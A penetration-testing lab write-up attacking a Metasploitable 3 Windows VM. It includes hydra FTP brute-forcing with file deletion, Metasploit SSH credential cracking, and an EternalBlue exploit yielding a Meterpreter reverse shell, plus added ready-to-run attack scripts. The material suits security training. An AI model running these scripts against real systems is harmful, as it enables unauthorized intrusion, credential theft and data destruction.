Lab Assignment 04
Penetration Testing a Metasploitable 3 Windows 2008 Server via Different Ports
In this lab the target host is a Metasploitable 3 Windows 2008 server and the attacker is a Kali Linux machine. We scan the target to see which ports are open, then try to penetrate the host through each open port from the Kali machine.
First we start both machines. On Kali we use netdiscover to find which IPs are live in the network block:
#netdiscover -r 192.168.100.0/24
In the results, apart from the attacker's own IP and the host-system and gateway IPs, one more IP appears: that is the target machine.
So the target machine's IP is 192.168.100.4.
Next we scan the host to find which ports are open and which service versions they run. We use nmap for this enumeration:
#nmap -sV 192.168.100.4
The -sV option probes each open port for its service version, which makes it much easier to find a matching exploit for that service.
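The inventory step above is easier to build on when the scan is saved in a machine-readable form. The following is an added example (not part of the lab report): it runs the same -sV scan with grepable output and parses that output into a "port proto service version" list. The sample scan result embedded in it is constructed, not a real result from the lab target, and the version strings in it are illustrative.

```shell
#!/bin/sh
# Scan the target and turn the result into a "port proto service version" inventory.
# Assumptions: nmap is installed on the Kali box; the target IP is the one found above.

scan_target() {
    # -sV probes service versions; -oG writes grepable output that is easy to parse.
    # Not executed here; on Kali run:  scan_target 192.168.100.4 target.gnmap
    nmap -sV -oG "$2" "$1"
}

make_sample_gnmap() {
    # Constructed sample of nmap -sV -oG output for the lab target (not a real scan
    # result; version strings are illustrative). Fields on a line are tab separated.
    printf 'Host: 192.168.100.4 ()\tStatus: Up\n' > "$1"
    printf 'Host: 192.168.100.4 ()\tPorts: %s\tIgnored State: closed (995)\n' \
        '21/open/tcp//ftp//Microsoft ftpd/, 22/open/tcp//ssh//OpenSSH 7.1 (protocol 2.0)/, 445/open/tcp//microsoft-ds//Microsoft Windows Server 2008 R2 - 2012 microsoft-ds/, 3389/open/tcp//ms-wbt-server///, 8080/filtered/tcp//http///' >> "$1"
}

open_services() {
    # Print "port proto service version" for each open port in a grepable nmap file.
    # A Ports: entry is port/state/proto/owner/service/rpcinfo/version/; nmap replaces
    # any '/' inside a field with '|', so splitting on '/' is safe. Missing version -> "-".
    awk -F "$(printf '\t')" '
        /Ports: / {
            for (i = 1; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                sub(/^Ports: /, "", $i)
                n = split($i, entry, ", ")
                for (j = 1; j <= n; j++) {
                    split(entry[j], f, "/")
                    if (f[2] == "open")
                        printf "%s %s %s %s\n", f[1], f[3], f[5], (f[7] == "" ? "-" : f[7])
                }
            }
        }' "$1"
}

# On Kali:  scan_target 192.168.100.4 target.gnmap && open_services target.gnmap
```

Filtered or closed ports are dropped by the state check, and a service with no version banner (the 3389 entry in the sample) still appears, marked "-", so it is not forgotten when choosing what to attack next.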
21 (FTP) port exploit:
First we see that port 21/tcp is open and providing the FTP service; its version is Microsoft ftpd. Let's try to get into the target's FTP server. For that we just run ftp with the IP:
#ftp 192.168.100.4
We reach the FTP server but are stopped by the login prompt. To get past authentication we can use hydra to brute-force the username and password. To see what hydra is, run:
#whatis hydra
Hydra needs a list of usernames in a .txt file and a list of passwords in a .txt file. We could use a predefined list such as rockyou.txt; for today's experiment we use a self-made username list and password list.
Now we run hydra against the FTP login with these lists:
The brute-force login attack gives us a valid username and password for the FTP service.
Now we log in over FTP to see what files the server holds:
The login succeeds with the username and password we obtained.
To see what files the server has, we use the ls command.
These are the files in the FTP server's directory. Before putting or getting files we switch the transfer type to binary, so that non-text files are not corrupted:
ftp> binary
The get command then downloads a file from the remote server to the local machine. Files are saved in the directory the terminal is working in.
Here we can see welcome.png has arrived. This is the local directory where the downloaded files are saved. We are able to take these files only because of the target host's weak FTP credentials. Now let's download another file to check.
To delete a file from the server we write delete followed by the file name.
The file was deleted successfully: in the ls listing of all the files, welcome.png no longer appears.
To upload (put) a file back onto the server, for example the welcome.png we downloaded from there, we write put followed by the file name:
ftp> put welcome.png
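The credential guessing and the manual FTP session above can be scripted so that they are repeatable. The following is an added example, not part of the lab report: it builds small self-made wordlists with the mutations that credentials usually get, runs hydra with them against the FTP service, and replays the manual session (binary, ls, get, delete, put) through a non-interactive ftp client. The seed words are an assumption (Metasploitable 3 is built with Vagrant, so "vagrant" is a natural seed), not the lab's actual lists, and the target IP is the one found above.

```shell
#!/bin/sh
# FTP credential guessing and a scripted FTP session for the lab target.
# Assumptions: hydra and the ftp client are installed on Kali; the target is 192.168.100.4;
# the seed words below are an assumption, not the lab's real username/password lists.

make_wordlists() {
    # $1 = username list to write, $2 = password list to write.
    # Each password seed gets the mutations people actually apply: capitalised,
    # digits appended, punctuation appended. The output is de-duplicated.
    printf '%s\n' administrator vagrant ftp anonymous > "$1"
    for w in vagrant password admin; do
        cap="$(printf '%s' "$w" | cut -c1 | tr '[:lower:]' '[:upper:]')$(printf '%s' "$w" | cut -c2-)"
        printf '%s\n%s\n%s123\n%s!\n' "$w" "$cap" "$w" "$cap"
    done | sort -u > "$2"
}

ftp_bruteforce() {
    # $1 = target, $2 = user list, $3 = password list. Not executed by the offline test.
    # -e nsr additionally tries an empty password, the login as password and the login
    # reversed; -f stops after the first valid pair; -t 4 keeps the thread count low so
    # the server does not start refusing connections; -o records hits in a file.
    hydra -L "$2" -P "$3" -e nsr -f -t 4 -o hydra_ftp.txt "$1" ftp
}

ftp_session_script() {
    # $1 = username, $2 = password. Emits the command script for a non-interactive
    # session (ftp -n turns off auto-login so the explicit 'user' line is used) that
    # repeats the manual steps: log in, binary mode, list, download, delete, re-upload.
    cat <<EOF
user $1 $2
binary
ls
get welcome.png
delete welcome.png
put welcome.png
quit
EOF
}

ftp_run() {
    # $1 = target, $2 = username, $3 = password. Not executed by the offline test.
    ftp_session_script "$2" "$3" | ftp -n -v "$1"
}

# On Kali:  make_wordlists users.txt passwords.txt
#           ftp_bruteforce 192.168.100.4 users.txt passwords.txt
#           ftp_run 192.168.100.4 <user> <password>
```

The -f flag matters on a lab box with one account: without it hydra keeps hammering the service after the first hit, and Microsoft ftpd will eventually start rejecting connections, which looks like a false negative for the remaining pairs.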
22 (SSH) port exploit:
To get access over SSH we need a username and password to log in with. Now we crack the SSH login using Metasploit. To start Metasploit, run msfconsole:
#msfconsole
Now we search for the ssh_login module (an auxiliary login scanner, not a payload) for username/password cracking.
Two modules are found; we take ssh_login, whose index is 0, and select it with use 0. (Selecting it by its full name, auxiliary/scanner/ssh/ssh_login, is more reliable, since the search index changes as modules are added.)
msf6> use 0
Now we set RHOSTS, the user list file and the password list file, and set STOP_ON_SUCCESS to true so the scan stops at the first valid pair:
msf6> set RHOSTS 192.168.100.4
msf6> set USER_FILE /home/kali/Desktop/username.txt
msf6> set PASS_FILE /home/kali/Desktop/password.txt
msf6> set STOP_ON_SUCCESS true
To review the settings we run show options:
msf6> show options
Running the module finds the credentials: username vagrant, password vagrant.
445 (SMB) port exploit:
Port 445 carries Server Message Block (SMB), the protocol used to share files between operating systems, i.e. Windows-Windows, Unix-Unix and Unix-Windows. An older dialect of SMB is also known as the Common Internet File System (CIFS).
Here we use nmap to enumerate port 445 to see whether it is open and to gather system information.
This scan shows the port state and version along with device information. Nmap ships many scripts for vulnerability scanning; now we scan with the built-in scripts for SMB vulnerabilities (the pattern is quoted so the shell cannot expand the * against files in the current directory):
#nmap --script "smb-vuln*" -p 445 192.168.100.4
This scan reports a vulnerability in the target's SMB service on port 445. Looking the finding up on a CVE site shows its severity: it is rated high, and the target is vulnerable to MS17-010, the SMBv1 flaw exploited by EternalBlue.
Now let's exploit this vulnerability with Metasploit. Start it with msfconsole:
#msfconsole
Now we search for a module for the MS17-010 vulnerability:
msf6> search ms17-010
We set RHOSTS 192.168.100.4, configure the payload and run exploit. On success the module returns a Meterpreter reverse shell, which is our gateway for controlling the target.
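Both Metasploit steps in this lab, the SSH login scan and the MS17-010 exploit, can be written as resource scripts so they run the same way every time, and the exploit can be gated on nmap's own check rather than launched blind. The following is an added example and not part of the lab report. It assumes msfconsole and nmap are on Kali and uses the standard module names: the lab selects ssh_login by its search index and never names the ms17-010 module it ran, so exploit/windows/smb/ms17_010_eternalblue (with its default x64 Meterpreter payload) is an assumption. LHOST is the attacker's IP, which the lab does not state, so it is a parameter. The nmap output excerpts are constructed in the format the vulns NSE library prints, not real scan results.

```shell
#!/bin/sh
# Resource scripts for the two Metasploit steps of the lab, plus a gate that only launches
# the MS17-010 exploit when nmap's smb-vuln-ms17-010 check reports the host vulnerable.
# Assumptions: module names are the standard ones (the lab does not name the ms17-010
# module it used); LHOST is the attacker's IP, which the lab does not state.

ssh_login_rc() {
    # $1 = RHOSTS, $2 = USER_FILE, $3 = PASS_FILE. The full module path instead of
    # "use 0" does not depend on the order search happens to return.
    cat <<EOF
use auxiliary/scanner/ssh/ssh_login
set RHOSTS $1
set USER_FILE $2
set PASS_FILE $3
set STOP_ON_SUCCESS true
set VERBOSE true
run
EOF
}

ms17_010_check() {
    # $1 = target, $2 = output file. Run only the ms17-010 NSE script against 445 and keep
    # normal output for parsing. Not executed by the offline test.
    nmap --script smb-vuln-ms17-010 -p 445 -oN "$2" "$1"
}

ms17_010_vulnerable() {
    # True only when the smb-vuln-ms17-010 block of an nmap -oN file says State: VULNERABLE.
    # Other smb-vuln-* blocks are ignored, so a different finding cannot trigger this exploit.
    awk '/^[|][ _]smb-vuln-/ { inblk = ($0 ~ /smb-vuln-ms17-010/) }
         inblk && /State: VULNERABLE/ { found = 1 }
         END { exit !found }' "$1"
}

eternalblue_rc() {
    # $1 = RHOSTS, $2 = LHOST (attacker IP). "exploit -z" keeps the new session in the
    # background instead of dropping into it, which suits a resource script.
    cat <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $2
exploit -z
EOF
}

run_rc() {
    # Feed a resource script to a quiet msfconsole. Not executed by the offline test.
    msfconsole -q -r "$1"
}

sample_nse_vulnerable() {
    # Constructed nmap -oN excerpt in the vulns NSE output format (not a real scan result).
    cat <<'EOF'
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_
EOF
}

sample_nse_other() {
    # Constructed excerpt where a different script reports a finding and ms17-010 did not.
    cat <<'EOF'
Host script results:
| smb-vuln-ms10-054:
|   VULNERABLE:
|     State: VULNERABLE
|_
EOF
}

# On Kali:
#   ssh_login_rc 192.168.100.4 /home/kali/Desktop/username.txt /home/kali/Desktop/password.txt > ssh.rc && run_rc ssh.rc
#   ms17_010_check 192.168.100.4 smb.nmap && ms17_010_vulnerable smb.nmap \
#     && eternalblue_rc 192.168.100.4 <kali ip> > eb.rc && run_rc eb.rc
```

The gate is worth the extra step because the EternalBlue exploit corrupts kernel memory on the target; running it against a host that the check did not confirm as vulnerable risks a crash for nothing, and the parser deliberately ignores any other smb-vuln-* result in the same file so that only the matching finding triggers it.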